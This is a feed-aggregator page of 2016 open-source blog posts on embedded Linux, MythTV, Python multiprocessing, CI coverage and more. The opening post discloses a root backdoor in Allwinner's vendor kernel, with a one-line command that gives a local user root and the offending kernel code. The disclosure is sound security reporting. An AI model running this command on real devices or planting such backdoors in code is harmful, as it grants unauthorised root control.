Anyway, one of the points we make emphasis on to our students is that the very concept of embedded makes the mere idea of downloading a pre-built, 4GB image, loaded with a (supposedly lightweight, but far fatter than my usual) desktop environment and whatnot an irony.

As part of the "Linux Userspace" and "Boot process" modules, we make a lot of emphasis on how to build a minimal image. And even leaving installed size aside, it all boils down to trust. We teach mainly four different ways of setting up a system:

  • Using our trusty Debian Installer in the (unfortunately few) devices where it is supported
  • Installing via Debootstrap, as I did in my CuBox-i tutorial (note that the tutorial is nowadays obsolete. The CuBox-i can boot with Debian Installer!) and just keeping the boot partition (both for u-boot and for the kernel) of the vendor-provided install (see the command sketch just after this list)
  • Building a barebones system using the great Buildroot set of scripts and hacks
  • Downloading a full, but minimal, installed image, such as OpenWRT (I have yet to see what's there about its fork, LEDE)
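
For the Debootstrap route, the heart of it is a single command run against the target root filesystem; the mount point, suite and mirror below are placeholders, not the exact ones from my tutorial:

# debootstrap --arch=armhf jessie /mnt/target http://httpredir.debian.org/debian
# chroot /mnt/target /bin/bash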

Now... In the past few days, a huge vulnerability / oversight was discovered and made public, supporting my distrust of distribution forms that do not come from, well... The people we already know and trust to do this kind of work!

Most current ARM chips cannot run with the stock, upstream Linux kernel. They require a set of patches that different vendors pile up to support their basic hardware (remember those systems are almost always systems-on-a-chip (SoC)). Some vendors do take on the hard work to try to upstream their changes — that is, push the changes they did to the kernel for inclusion in mainstream Linux. This is a very hard task, and many vendors just abandon it.

So, in many cases, we are stuck running with nonstandard kernels, full with huge modifications... And we trust them to do things right. After all, if they are knowledgeable enough to design a SoC, they should do at least decent kernel work, right?

Turns out, it's far from the case. I have a very nice and nifty Banana Pi M3, based on the Allwinner A83T SoC. 2GB RAM, 8 ARM cores... A very nice little system, almost usable as a desktop. But it only boots with their modified 3.4.x kernel.

This kernel has a very ugly flaw: A debugging mode left open, that allows any local user to become root. Even on a mostly-clean Debian system, installed by a chrooted debootstrap:

Debian GNU/Linux 8 bananapi ttyS0

banana login: gwolf
Password:

Last login: Thu Sep 24 14:06:19 CST 2015 on ttyS0
Linux bananapi 3.4.39-BPI-M3-Kernel #9 SMP PREEMPT Wed Sep 23 15:37:29 HKT 2015 armv7l

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.

gwolf@banana:~$ id
uid=1001(gwolf) gid=1001(gwolf) groups=1001(gwolf),4(adm),20(dialout),21(fax),24(cdrom),25(floppy),26(tape),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev)
gwolf@banana:~$ echo rootmydevice > /proc/sunxi_debug/sunxi_debug
gwolf@banana:~$ id
groups=0(root),4(adm),20(dialout),21(fax),24(cdrom),25(floppy),26(tape),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),1001(gwolf)

Why? Oh, well, in this kernel somebody forgot to comment out (or outright remove!) the sunxi-debug.c file, or at the very least, a horrid part of code therein (it's a very small, simple file):

if(!strncmp("rootmydevice",(char*)buf,12)){
        cred = (struct cred *)__task_cred(current);
        cred->uid = 0;
        cred->gid = 0;
        cred->suid = 0;
        cred->euid = 0;
        cred->euid = 0;
        cred->egid = 0;
        cred->fsuid = 0;
        cred->fsgid = 0;
        printk("now you are root\n");
}

Now... Just by looking at this file, many things should be obvious. For example, this is not only dangerous and lazy (it exists so developers can debug by touching a file instead of... typing a password?), but also goes against the kernel coding guidelines — the file is not documented nor commented at all. Peeking around other files in the repository, it gets obvious that many files suffer from this same basic issue — and having this upstreamed will become a titanic task. If their programmers had tried to adhere to the guidelines to begin with, integration would be a much easier path. Cutting the wrong corners will just increase the needed amount of work.

Anyway, enough said by me. Some other sources of information:

There are surely many other mentions of this. I just had to repeat it for my local echo chamber, and for future reference in class! ;-)

by gwolf at 2016-05-14 00:58

Planet GNOME

Bradley M. Kuhn: MythWeb Confusing Error Message - Planet GNOME

I'm finally configuring Kodi properly to watch over-the-air channels using this USB ATSC / DVB-T tuner card from Thinkpenguin. I hate taking time away, even on the weekends, from the urgent Conservancy matters, but I've been doing by-hand recordings using VLC for my wife when she's at work, and I just need to present a good solution at home to showcase software freedom here.

So, I installed Debian testing to get a newer Kodi. I did discover this bug after it had already been closed, but had to pull util-linux out of unstable for the moment since the fixed package hadn't moved to testing.

Kodi works fine after installing it via apt, and since VDR is packaged for Debian, I tried getting VDR working instead of MythTV at first. I almost had it working but then I got this error:

VNSI-Error: cxSocket::read: read() error at 0/4
when trying to use kodi-pvr-vdr-vnsi (1.11.15-1) with vdr-plugin-vnsiserver (1:1.3.1) combined with vdr (2.2.0-5) and kodi (16.0+dfsg1-1). I tried briefly using the upstream plugins for both VDR and Kodi just to be sure I'd produce the same error, and got the same so I started by reporting this on the Kodi VDR backend forum. If I don't get a response there in a few weeks, I'll file it as a bug against kodi-pvr-vdr-vnsi instead.

For now, I gave up on VDR (which I rather liked, as a very old-school, Unix-server style way to build a PVR), and tried MythTV instead since it's also GPL'd. Since there weren't Debian packages, I followed this building-from-source tutorial on MythTV's website.

I didn't think I'd actually need to install MythWeb at first, because I am using Kodi primarily and am only using the MythTV backend to handle the tuner card. It was pretty odd that you can only configure MythTV via a QT program called mythtv-setup, but ok, I did that, and it was relatively straightforward. Once I did, playback was working reasonably well using Kodi's MythTV plugin. (BTW, if you end up doing this, it's fine to test Kodi on its own in a window with a desktop environment running, but I had playback speed issues in that usage; they went away fully when I switched to a simple .xinitrc that just called kodi-standalone.)

The only problem left was that I noticed that I was not getting Event Information Table (EIT) data from the card to add to the Electronic Program Guide (EPG). Then I discovered that one must install MythWeb for the EIT data to make it through via the plugin for EPG in Kodi. Seems weird to me, but ok, I went to install MythWeb.

Oddly, this is where I had the most trouble, constantly receiving this error message:

PHP Fatal error: Call to a member function query_col() on null in /path/to/mythweb/modules/backend_log/init.php on line 15

The top net.search hit is likely to be this bug ticket, which points out that this is a horrible form of an error message to tell you the equivalent of “something is strange about the database configuration, but I'm not sure what”.

Indeed, I tried a litany of items which I found through lots of net.searching. Unfortunately I got a bit frantic, so I'm not sure which one solved my problem (I think it was actually quite obviously multiple ones :). I'm going to list them all here, in one place, so that future searchers for this problem will find all of them together:

  • Make sure the PHP load_path is coming through properly and includes the MythTV backend directory, ala:
    setenv include_path "/path/to/mythtv/share/mythtv/bindings/php/"
  • Make sure the mythtv user has a password set properly and is authorized in the database users table to have access from localhost, ::1, and 127.*, as it's sometimes unclear which way Apache might connect (see the example SQL just after this list).
  • In Debian testing, make sure PHP 7 is definitely not in use by MythWeb (I am guessing it is incompatible), and make sure the right PHP5 MySql modules are installed. The MythWeb installation instructions do say:
    apache2-mpm-prefork php5 php5-mysql libhttp-date-perl
    And at one point, I somehow got php5-mysql installed and libapache2-mod-php5 without having php5 installed, which I think may have caused a problem.
  • Also, read this thread from the MythTV mailing list as it is the most comprehensive in discussing this error.
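
For the database item above, the grants look roughly like the following. I'm assuming MythTV's usual mythconverg database name and a placeholder password here; adjust both to match what mythtv-setup actually configured:

GRANT ALL PRIVILEGES ON mythconverg.* TO 'mythtv'@'localhost' IDENTIFIED BY 'changeme';
GRANT ALL PRIVILEGES ON mythconverg.* TO 'mythtv'@'127.0.0.1' IDENTIFIED BY 'changeme';
GRANT ALL PRIVILEGES ON mythconverg.* TO 'mythtv'@'::1' IDENTIFIED BY 'changeme';
FLUSH PRIVILEGES;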

I did have to update the channel lineup with mythfilldatabase --dd-grab-all

by Bradley M. Kuhn (bkuhn@ebb.org) at 2016-05-14 00:54

Bradley M. Kuhn: That “My Ears are Burning” Thing Is Definitely Apocryphal - Planet GNOME

I've posted in the past about the Oracle vs. Google case. I'm for the moment sticking to my habit of only commenting when there is a clear court decision. Having been through litigation as the 30(b)(6) witness for Conservancy, I'm used to court testimony and why it often doesn't really matter in the long run. So much gets said by both parties in a court case that it's somewhat pointless to begin analyzing each individual move, unless it's for entertainment purposes only. (It's certainly as entertaining as most TV dramas, really, but I hope folks who are watching step-by-step admit to themselves that they're just engaged in entertainment, not actual work. :)

I saw a lot go by today with various people as witnesses in the case. About the only part that caught my attention was that Classpath was mentioned over and over again. But that's not for any real salient reason, only because I remember so distinctly, sitting in a little restaurant in New Orleans with RMS and Paul Fisher, talking about how we should name this yet-to-be-launched GNU project “$CLASSPATH”. My idea was that it was a shell variable that would expand to /usr/lib/java, so, in my estimation, it was a way to name the project “User Libraries for Java” without having to say the words. (For those of you that were still children in the 1990s, trademark aggression by Sun at the time on their word mark for “Java” was fierce; it was worse than the whole problem with the Unix trademark, which led in turn to the GNU name.)

But today, as I saw people all over the Internet quoting judges, lawyers and witnesses saying the word “Classpath” over and over again, it felt a bit weird to think that, almost 20 years ago sitting in that restaurant, I could have said something other than Classpath and the key word in Court today might well have been whatever I'd said. Court cases are, as I said, dramatic, and as such, it felt a little like having my own name mentioned over and over again on the TV news or something. Indeed, I felt today like I had some really pointless, one-time-use superpower that I didn't know I had at the time. I now further have this feeling of: “darn, if I knew that was the one thing I did that would catch on this much, I'd have tried to do or say something more interesting”.

Naming new things, particularly those that have to replace other things that are non-Free, is really difficult, and, at least speaking for myself, I definitely can't tell when I suggest a name whether it is any good or not. I actually named another project, years later, that could theoretically get mentioned in this case, Replicant. At that time, I thought Replicant was a much more creative name than Classpath. When I named Classpath, I felt it was a somewhat obvious corollary to the “GNU'S Not Unix” line of thinking. I also recall distinctly that I really thought the name lost all its cleverness when the $ and the all-caps were dropped, but RMS and others insisted on that :).

Anyway, my final message today is to the court transcribers. I know from chatting with the court transcribers during my depositions in Conservancy's GPL enforcement cases that technical terminology is really a pain. I hope that the term I coined that got bandied about so much in today's testimony was not annoying to you all. Really, no one thinks about the transcribers in all this. If we're going to have lawsuits about this stuff, we should name stuff with the forethought of making their lives easier when the litigation begins. :)

by Bradley M. Kuhn (bkuhn@ebb.org) at 2016-05-14 00:54

May 13, 2016

Planet Python

Peter Bengtsson: Time to do concurrent CPU bound work - Planet Python

Did you see my blog post about Decorated Concurrency - Python multiprocessing made really really easy? If not, fear not. There, I'm demonstrating how I take on the task of creating 100 thumbnails from a large JPG. First in serial, then concurrently, with a library called deco. The total time to get through the work massively reduces when you do it concurrently. No surprise. But what's interesting is that each individual task takes a lot longer. Instead of 0.29 seconds per image it took 0.65 seconds per image (...inside each dedicated processor).

The simple explanation, even from a layman like myself, must be that when doing so much more, concurrently, the whole operating system struggles to keep up with other little subtle tasks.

With deco you can either let Python's multiprocessing just use as many CPUs as your computer has (8 in the case of my Macbook Pro) or you can manually set it. E.g. @concurrent(processes=5) would spread the work across a max of 5 CPUs.

So, I ran my little experiment again for every number from 1 to 8 and plotted the results:

Time elapsed vs. work time

What to take away...

The blue bars are the time it takes, in total, from starting the program till the program ends. The lower the better.

The red bars are the time it takes, in total, to complete each individual task.

Meaning, when the number of CPUs is low you have to wait longer for all the work to finish and when the number of CPUs is high the computer needs more time to finish its work. This is an insight into over-use of operating system resources.

If the work is much much more demanding than this experiment (the JPG is only 3.3Mb and one thumbnail only takes 0.3 seconds to make) you might have a red bar on the far right that is too expensive for your server. Or worse, it might break things so that everything stops.

In conclusion...

Choose wisely. Be aware how "bound" the task is.

Also, remember that if the work of each individual task is too "light", the overhead of messing with multiprocessing might actually cost more than it's worth.

The code

Here's the messy code I used:

import time
from PIL import Image
from deco import concurrent, synchronized
import sys

processes = int(sys.argv[1])
assert processes >= 1
assert processes <= 8


@concurrent(processes=processes)
def slow(times, offset):
    t0 = time.time()
    path = '9745e8.jpg'
    img = Image.open(path)
    size = (100 + offset * 20, 100 + offset * 20)
    img.thumbnail(size, Image.ANTIALIAS)
    img.save('thumbnails/{}.jpg'.format(offset), 'JPEG')
    t1 = time.time()
    times[offset] = t1 - t0


@synchronized
def run(times):
    for index in range(100):
        slow(times, index)

t0 = time.time()
times = {}
run(times)
t1 = time.time()
print "TOOK", t1-t0
print "WOULD HAVE TAKEN", sum(times.values())

by Planet Python at 2016-05-13 22:41

LWN.net

Schaller: H264 in Fedora Workstation - LWN.net

At his blog, Christian Schaller discusses the details of the OpenH264 media codec from Cisco, which is now available in Fedora. In particular, he notes that the codec only handles the H.264 "Baseline" profile. "So as you might guess from the name Baseline, the Baseline profile is pretty much at the bottom of the H264 profile list and thus any file encoded with another profile of H264 will not work with it. The profile you need for most online videos is the High profile. If you encode a file using OpenH264 though it will work with any decoder that can do Baseline or higher, which is basically every one of them." Wim Taymans of GStreamer is looking at improving the codec with Cisco's OpenH264 team.

by n8willis at 2016-05-13 22:11

Planet Ubuntu

Aaron Honeycutt: Some LoCo updates - Planet Ubuntu

Ubuntu 16.04 LTS Release:

I did not get around to posting the results for the 16.04 LTS release party since I locked myself out of this blog lol.

Here are some pictures! Even my dad got into the release spirit!

highres_448524371 highres_448528960 highres_448528986

On to Ubuntu Hour’s:

We’re still having them and I think they are going very well, bringing in some new people every so often.

highres_445748101

SELF 2016

SouthEast Linux Fest is right around the corner! It starts on June 9, and the Florida LoCo will be there, of course!

Up next will be a Ubuntu Touch update which I’ll get out within the next week. Thanks for reading!

by Planet Ubuntu at 2016-05-13 19:06

Damn Interesting

Into the Bewilderness - Damn Interesting

Charles Waterton was born in Yorkshire, England in 1782, to an aristocratic Catholic family whose ancestors included members of several royal families. The life of an idle nobleman didn’t appeal to him, however. From a young age, he displayed a passion for studying and interacting with animals in a very hands-on way.

An inveterate tree-climber, Waterton was grateful for the wide array of bird species found on his family’s estate. He was so much of a birdbrain that teachers complained of his “vast proficiency in the art of finding birds’ nests” distracting him from his studies. Like his teachers, Waterton’s classmates noticed his fondness for being amongst animals. He was the one called upon when the boys wanted someone to tame an angry goose, or to ride a cow for their entertainment. He was even appointed rat catcher at his Jesuit boys’ school.

Waterton’s youthful interest in trapping the animals around him evolved into a specialist desire to understand less common animals. This being the Victorian era, and Waterton having the time and money to devote to his preoccupations, his obsessions prompted amusement in the readers of his prolific writings, rather than consternation. For instance, he once described a dissection of a vulture’s nose as “beautiful.” And he was an expert on how a variety of tropical animals, from the howler monkey to the toucan, tasted. The former, apparently, is not dissimilar to goat, while the latter should be boiled for best results.

This type of contradiction–being moved by animals, yet also scientifically dedicated to studying them by killing and preserving them in scientifically novel ways–would be a theme throughout Waterton’s life. The man clearly had complex feelings about his relationships with animals. Perhaps the most significant of these feelings was the desire to transcend the divisions within the animal kingdom: divisions between animals, but also ones separating himself and the creatures he loved.

Continue reading ▶

by Alan Bellows (webmaster@damninteresting.com) at 2016-05-13 19:00

Planet Python

Peter Bengtsson: Decorated Concurrency - Python multiprocessing made really really easy - Planet Python

tl;dr There's a new interesting wrapper on Python multiprocessing called deco, written by Alex Sherman and Peter Den Hartog, both at University of Wisconsin - Madison. It makes Python multiprocessing really really easy.

The paper is here (PDF) and the code is here: https://github.com/alex-sherman/deco.

This library is based on something called Pydron which, if I understand it correctly, is still a piece of research with no code released. ("We currently estimate that we will be ready for the release in the first quarter of 2015.")

Apart from using simple decorators on functions, the big difference with deco is that it makes it really easy to get started and that there's a hard restriction on how to gather the results of sub-process calls. In deco, you pass in a mutable object that has a keyed index (e.g. a python dict). A python list is also mutable but it doesn't have an index. Meaning, you could get race conditions on mylist.append().

"However, DECO does impose one important restriction on the program: all mutations may only by index based."

Some basic example

Just look at this example:

# before.py

def slow(index):
    time.sleep(5)

def run():
    for index in list('123'):
        slow(index)
run()

And when run, you clearly expect it to take 15 seconds:

$ time python before.py

real    0m15.090s
user    0m0.057s
sys 0m0.022s

Ok, let's parallelize this with deco. First pip install deco, then:

# after.py

from deco import concurrent, synchronized

@concurrent
def slow(index):
    time.sleep(5)

@synchronized
def run():
    for index in list('123'):
        slow(index)

run()

And when run, it should be less than 15 seconds:

$ time python after.py

real    0m5.145s
user    0m0.082s
sys 0m0.038s

About the order of execution

Let's put some logging into that slow() function above.

def slow(index):
    time.sleep(5)
    print 'done with {}'.format(index)

Run the example a couple of times and note that the order is not predictable:

$ python after.py
done with 1
done with 3
done with 2
$ python after.py
done with 1
done with 2
done with 3
$ python after.py
done with 3
done with 2
done with 1

That probably doesn't come as a surprise to those familiar with async stuff, but it's worth a reminder so you don't accidentally depend on order.

@synchronized or .wait()

Remember the run() function in the example above? The @synchronized decorator is magic. It basically figures out that within the function call there are calls out to sub-process work. What it does is that it "pauses" until all those have finished. An alternative approach is to call the .wait() method on the @concurrent-decorated function:

def run():
    for index in list('123'):
        slow(index)
    slow.wait()

That works the same way. This could potentially be useful if you, on the next line, need to depend on the results. But if that's the case you could just split up the function and slap a @synchronized decorator on the split-out function.

No Fire-and-forget

It might be tempting to not set the @synchronized decorator and not call .wait() hoping the work will be finished anyway somewhere in the background. The functions that are concurrent could be, for example, functions that generate thumbnails from a larger image or something time consuming where you don't care when it finishes, as long as it finishes.

# fireandforget.py
# THIS DOES NOT WORK
# And it's not expected to either.

@concurrent
def slow(index):
    time.sleep(5)

def run():
    for index in list('123'):
        slow(index)

run()

When you run it, you don't get an error:

$ time python fireandforget.py

real    0m0.231s
user    0m0.079s
sys 0m0.047s

But if you dig deeper, you'll find that it never actually executes those concurrent functions.

If you want to do fire-and-forget you need to have another service/process that actually keeps running and waiting for all work to be finished. That's how the likes of a message queue works.

Number of concurrent workers

multiprocessing.Pool automatically, as far as I can understand, figures out how many concurrent jobs it can run. On my Mac, where I have 8 CPUs, the number is 8.

This is easy to demonstrate. In the example above it does exactly 3 concurrent jobs, because len(list('123')) == 3. If I make it 8 items, the whole demo run takes, still, 5 seconds (plus a tiny amount of overhead). If I make it 9 items, it now takes 10 seconds.

How multiprocessing figures this out I don't know but I can't imagine it being anything but a standard lib OS call to ask the operating system how many CPUs it has.
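
As it happens, the standard library exposes exactly that query, so you can check what Pool will default to on your machine:

import multiprocessing

# Pool() with no `processes` argument starts this many workers by default.
print multiprocessing.cpu_count()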

You can actually override this with your own number. It looks like this:

from deco import concurrent

@concurrent(processes=5)
def really_slow_and_intensive_thing():
    ...

So that way, the operating system doesn't get too busy. It's like a throttle.

A more realistic example

Let's actually use the mutable object for something and let's do something that isn't just a time.sleep(). Also, let's do something that is CPU bound. A lot of the time concurrency is useful when you're network bound, because running many network-waiting tasks at the same time doesn't stop the system from being able to do other things.

Here's the code:

from PIL import Image
from deco import concurrent, synchronized


@concurrent
def slow(times, offset):
    t0 = time.time()
    path = '9745e8.jpg'
    img = Image.open(path)
    size = (100 + offset * 20, 100 + offset * 20)
    img.thumbnail(size, Image.ANTIALIAS)
    img.save('thumbnails/{}.jpg'.format(offset), 'JPEG')
    t1 = time.time()
    times[offset] = t1 - t0

@synchronized
def run(times):
    for index in range(100):
        slow(times, index)

t0 = time.time()
times = {}
run(times)
t1 = time.time()
print "TOOK", t1-t0
print "WOULD HAVE TAKEN", sum(times.values())

It generates 100 different thumbnails from a very large original JPG. Running this on my macbook pro takes 8.4 seconds but the individual times add up to a total of 65.1 seconds. The numbers make sense, because 65 seconds / 8 cores ~= 8 seconds.

But, where it gets really interesting is that if you remove the deco decorators and run the 100 thumbnail creations in serial, on my laptop, it takes 28.9 seconds. Now, 28.9 seconds is much more than 8.4 seconds so it's still a win for multiprocessing for this kind of CPU bound work. However, a stampeding herd of 8 CPU-intensive tasks running at the same time can put some serious strain on your system. Also, it could cause high spikes in terms of memory allocation that wouldn't have happened if freed space could be re-used in the serial pattern.

Here's by the way the difference in what this looks like in the Activity Monitor:

Fully concurrent PIL work: running PIL on all CPUs

Same work but in serial

One more "realistic" pattern

Let's do this again with a network bound task. Let's download 100 webpages from my blog. We'll do this by keeping an index where the URL is the key and the value is the time it took to download that one individual URL. This time, let's start with the serial pattern:

(Note! I ran these two experiments a couple of times so that the server-side cache would get a chance to clear out outliers)

import time, requests

urls = """
https://www.peterbe.com/plog/blogitem-040212-1
https://www.peterbe.com/plog/geopy-distance-calculation-pitfall
https://www.peterbe.com/plog/app-for-figuring-out-the-best-car-for-you
https://www.peterbe.com/plog/Mvbackupfiles
...a bunch more...
https://www.peterbe.com/plog/swedish-holidays-explaine
https://www.peterbe.com/plog/wing-ide-versus-jed
https://www.peterbe.com/plog/worst-flash-site-of-the-year-2010
""".strip().splitlines()
assert len(urls) == 100

def download(url, data):
    t0 = time.time()
    assert requests.get(url).status_code == 200
    t1 = time.time()
    data[url] = t1-t0

def run(data):
    for url in urls:
        download(url, data)

somemute = {}
t0 = time.time()
run(somemute)
t1 = time.time()
print "TOOK", t1-t0
print "WOULD HAVE TAKEN", sum(somemute.values()), "seconds"

When run, the output is:

TOOK 35.3457410336
WOULD HAVE TAKEN 35.3454759121 seconds

Now, let's add the deco decorators, so basically these changes:

from deco import concurrent, synchronized

@concurrent
def download(url, data):
    t0 = time.time()
    assert requests.get(url).status_code == 200
    t1 = time.time()
    data[url] = t1-t0

@synchronized
def run(data):
    for url in urls:
        download(url, data)

And the output this time:

TOOK 5.13103795052
WOULD HAVE TAKEN 39.7795288563 seconds

So, instead of it having to take 39.8 seconds it only needed to take 5 seconds with extremely little modification. I call that a win!

What's next

Easy; actually build something that uses this.

by Planet Python at 2016-05-13 16:57

LWN.net

Friday's security updates - LWN.net

Arch Linux has updated chromium (multiple vulnerabilities), flashplugin (multiple vulnerabilities), lib32-flashplugin (multiple vulnerabilities), and libksba (denial of service).

CentOS has updated thunderbird (C7: multiple vulnerabilities).

Debian has updated libxstream-java (XML external-entity attack).

Debian-LTS has updated libgwenhywfar (outdated CA certificates) and libuser (multiple vulnerabilities).

Fedora has updated glibc (F23: denial of service).

Mageia has updated flash-player-plugin (M5: multiple vulnerabilities) and mercurial (M5: code execution).

openSUSE has updated libxml2 (Leap 42.1: denial of service) and ntp (Leap 42.1: multiple vulnerabilities).

Oracle has updated kernel (O7: privilege escalation) and thunderbird (O7; O6: multiple vulnerabilities).

Red Hat has updated chromium-browser (RHEL6: multiple vulnerabilities), docker (RHEL7: privilege escalation), flash-plugin (RHEL 5,6: multiple vulnerabilities), and openshift (RHOSE 3.2: multiple vulnerabilities).

SUSE has updated java-1_7_1-ibm (SLE12; SLE11: multiple vulnerabilities), ntp (SLE12: multiple vulnerabilities), and openssl (SLE11, SSO1.3, SOSC5, SMP2.1, SM2.1: multiple vulnerabilities).

by n8willis at 2016-05-13 16:34

planet.freedesktop.org

Bastien Nocera: Blutella, a Bluetooth speaker receiver - planet.freedesktop.org

Quite some time ago, I was asked for a way to use the AV amplifier (which has a fair bunch of speakers connected to it) in our living-room that didn't require turning on the TV to choose a source.

I decided to try and solve this problem myself, as an exercise rather than a cost saving measure (there are good-quality Bluetooth receivers available for between 15 and 20€).

Introducing Blutella



I found this pot of Nutella in my travels (in Europe, smaller quantities are usually in a jar that looks like a mustard glass, with straight sides) and thought it would be a perfect receptacle for a CHIP, to allow streaming via Bluetooth to the amp. I wanted to make a nice how-to for you, dear reader, but best laid plans...

First, the materials:
  • a CHIP
  • jar of Nutella, and "Burnt umber" acrylic paint
  • micro-USB to USB-A and jack 3.5mm to RCA cables
  • Some white Sugru, for a nice finish around the cables
  • bit of foam, a Stanley knife, a CD marker

That's around 10€ in parts (cables always seem to be expensive), not including our salvaged Nutella jar, and the CHIP itself (9$ + shipping).

You'll start by painting the whole of the jar, on the inside, with the acrylic paint. Allow a couple of days to dry, it'll be quite thick.

So, the plan that went awry. Turns out that the CHIP, with the cables plugged in, doesn't fit inside this 140g jar of Nutella. I also didn't make the holes exactly in the right place. The CHIP is tiny, but not small enough to rotate inside the jar without hitting the side, and the groove to screw the cap also has only one position.

Anyway, I pierced two holes in the lid for the audio jack and the USB charging cable, stuffed the CHIP inside, and forced the lid on so it clipped on the jar's groove.

I had nice photos with foam I cut to hold the CHIP in place, but the finish isn't quite up to my standards. I guess that means I can attempt this again with a bigger jar ;)

The software

After flashing the CHIP with Debian, I logged in, and launched a script which I put together to avoid either long how-tos, or errors when I tried to reproduce the setup after a firmware update and reset.

The script for setting things up is in the CHIP-bluetooth-speaker repository. There are a few bugs due to drivers, and lack of integration, but this blog is the wrong place to track them, so check out the issues list.

Apart from those driver problems, I found the integration between PulseAudio and BlueZ pretty impressive, though I wish there were a way for the speaker, when turned on again, to reconnect to the phone I last streamed from, as Bluetooth speakers and headsets do; that would remove one step from playing back audio.

by planet.freedesktop.org at 2016-05-13 16:30

Planet Python

PythonClub - A Brazilian collaborative blog about Python: Python with Unittest, Travis CI, Coveralls and Landscape (Part 3 of 4) - Planet Python

Hey everyone, how's it going?

In the second part of this tutorial, we learned how to use Travis CI to automate our project's tests, making the code easier to maintain when there are several contributors. In this third part, we are going to configure the Coveralls service so that it generates test reports for our project. These reports are very useful when we want to check how much of our project is covered by tests, making sure no important feature is left out. Just like Travis CI, Coveralls will run after every push or pull request.

Unlike the previous tutorial, I will be brief about the Coveralls sign-up process and focus more on how to use it.

Creating an account

Before we start using Coveralls we need to create an account on the service. That can be done here. The service is completely free for open source projects.

After signing up, you will be taken to a new page listing the repositories you have on GitHub.

In the image above we can already see the project I am using in this tutorial: codigo-avulso-test-tutorial. If your repository is not in the list, click the ADD REPOS button in the upper right corner of the screen.

When you click that button, you will be redirected to a page where you can select which repositories Coveralls should analyze. If the repository you want is not in the list, click the RE-SYNC REPOS button in the upper right corner. It will scan your GitHub profile and import your projects.

Click the button labeled OFF to the left of the repository name. This enables the service for that repository.

Click the DETAILS button to the right of the repository name and you will be redirected to a configuration screen. Here the most interesting step is grabbing the badge URL so we can use it in our README.md.

Coverage Status

In the upper area of the screen, we have the following:

Click EMBED and a dialog window will open; select and copy the MARKDOWN code.

Now paste the code into the header of your README.md file, similar to what we did with Travis CI in the previous tutorial.

# Codigo Avulso Test Tutorial
[![Build Status](https://travis-ci.org/mstuttgart/codigo-avulso-test-tutorial.svg?branch=master)](https://travis-ci.org/mstuttgart/codigo-avulso-test-tutorial)

[![Coverage Status](https://coveralls.io/repos/github/mstuttgart/codigo-avulso-test-tutorial/badge.svg?branch=master)](https://coveralls.io/github/mstuttgart/codigo-avulso-test-tutorial?branch=master)

With this step complete, the next step is to add the service to our project on GitHub.

Adding Coveralls

We will add the service to the project's testing process. That way, after every push or pull request, Coveralls will generate a report about our tests.

Open the .travis.yml file in your editor. We have the following code:

language: python

python:
  - "2.7"

sudo: required

install:
  - pip install flake8

before_script:
  - flake8 codigo_avulso_test_tutorial

script:
  - python setup.py test

Now let's change it to add the Coveralls functionality. The updated .travis.yml can be seen below:

language: python

python:
  - "2.7"

sudo: required

install:
  - pip install flake8
  - pip install coveralls

before_script:
  - flake8 codigo_avulso_test_tutorial

script:
  - coverage run --source=codigo_avulso_test_tutorial setup.py test

after_success:
  - coveralls
  • install: here we add the pip install coveralls command. Installing coveralls is required so that we can generate the reports. Note: you can also install it on your own machine and generate HTML reports (a small sketch follows this list); that is left as a suggestion for further study.
  • script: here we replace the python setup.py test command with coverage run --source=codigo_avulso_test_tutorial setup.py test. This command runs the same tests as before, but also produces a report on how much of your code is covered by tests.
  • after_success: the last change was adding the after_success tag. This tag indicates that, after the tests finish successfully, the Coveralls analysis service should be started.
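
As a hedged aside (this is my sketch, not part of the original post): if you want to try the local HTML reports mentioned above, the coverage Python API can be driven directly. The tests/ directory name here is an assumption; adjust it to your project layout.

import coverage
import unittest

cov = coverage.Coverage(source=["codigo_avulso_test_tutorial"])
cov.start()

# run whatever test suite you have; plain unittest discovery is used here
suite = unittest.defaultTestLoader.discover("tests")
unittest.TextTestRunner().run(suite)

cov.stop()
cov.save()
cov.html_report(directory="htmlcov")  # then open htmlcov/index.html in a browser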

As soon as you finish making these changes you can push your code to GitHub. Once the code is up, Travis CI will start the test process. When the tests finish, Coveralls will be started. If everything goes well, the badge we added to the project's README file will be updated, showing the percentage of our code that is covered by tests. You can click the badge, or go to your profile on the Coveralls site, to see your project's information in more detail.

In the LATEST BUILDS section, click on the most recent build and you will be able to see the test coverage percentage for each file in your project.

If you are interested, here is the link to the repository I used for this tutorial: codigo-avulso-test-tutorial.

Conclusion

This wraps up the third part of our tutorial series on Unittest. Coveralls has many more settings that are not shown here, so if you are interested it is worth studying further. In the next tutorial we will see how to use Landscape, a linter that analyzes our code looking for syntax problems, formatting issues, and possible coding errors (undeclared variables, variables with the wrong scope, and so on).

That's it, folks. Thanks for reading this far, and see you in the next tutorial!

Originally published at: python-com-unittest-travis-ci-coveralls-e-landscape-parte-3-de-4

by Planet Python at 2016-05-13 15:25

Reinout van Rees: Pygrunn keynote: the future of programming - Steven Pemberton - Planet Python

(One of my summaries of the one-day 2016 PyGrunn conference).

Steven Pemberton (https://en.wikipedia.org/wiki/Steven_Pemberton) is one of the developers of ABC, a predecessor of python.

He's a researcher at CWI in Amsterdam. CWI was the first non-military internet site in Europe, in 1988, when the whole of Europe was still connected to the USA over a single 64 kbit/s link.

When designing ABC they were considered completely crazy because it was an interpreted language. Computers were slow at that time. But they knew about Moore's law. Computers would become much faster.

At that time computers were very, very expensive. Programmers were basically free. Now it is the other way. Computers are basically free and programmers are very expensive. So, at that time, in the 1950s, programming languages were designed around the needs of the computer, not the programmer.

Moore's law is still going strong. Despite many articles claiming its imminent demise. He heard the first one in 1977. Steven showed a graph of his own computers. It fits.

On modern laptops, the CPU is hardly doing anything most of the time. So why use programming languages optimized for giving the CPU a rest?

There's another cost. The more lines a program has, the more bugs there are in it. But it is not a linear relationship. More like lines ^ 1.5. So a program with 10x more lines probably has 30x more bugs.

Steven thinks the future of programming is in declarative programming instead of in procedural programming. Declarative code describes what you want to achieve and not how you want to achieve it. It is much shorter.

Procedural code would have specified everything in detail. He showed a code example of 1000 lines. And a declarative one of 15 lines. Wow.
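
As a toy Python illustration of the difference (my example, not from the talk): the procedural version spells out how to build the result step by step, while the declarative-ish comprehension only states what the result should contain.

# Procedural: describe *how* to collect the even squares.
evens_squared = []
for n in range(10):
    if n % 2 == 0:
        evens_squared.append(n * n)

# Declarative-ish: describe *what* you want and let the language do the rest.
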